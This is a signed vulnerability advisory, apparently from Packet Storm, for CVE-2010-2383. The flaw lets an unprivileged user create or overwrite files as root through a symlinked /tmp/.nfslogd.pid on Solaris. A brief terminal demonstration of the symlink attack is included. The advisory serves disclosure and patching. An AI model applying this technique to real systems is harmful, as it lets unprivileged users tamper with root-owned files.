Solaris nfslogd Unsafe Use Of Temporary Files

2010-07-21T00:00:00
ID PACKETSTORM:91999
Type packetstorm
Reporter Frank Stuart
Modified 2010-07-21T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Below is the full disclosure information for CVE-2010-2383. It was  
reported to security-alert@sun.com on 29 December, 2009 and assigned Sun  
bug 6913655.  
  
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical  
Patch Update  
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).  
  
- ------  
This one is with nfslogd which allows an unprivileged  
user to create/overwrite a file as root:  
  
Don't Panic! # ls -dl /etc/oops  
/etc/oops: No such file or directory  
Don't Panic! # ls -dl /tmp/.nfslogd.pid  
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid  
- -> /etc/oops  
Don't Panic! # id  
uid=0(root) gid=0(root)  
Don't Panic! # /usr/lib/nfs/nfslogd  
Don't Panic! # ls -dl /etc/oops  
- -rw------- 1 root root 4 Dec 29 21:25 /etc/oops  
  
- ------  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  
  
iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e  
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI  
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg  
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO  
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD  
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==  
=ojGd  
-----END PGP SIGNATURE-----  
`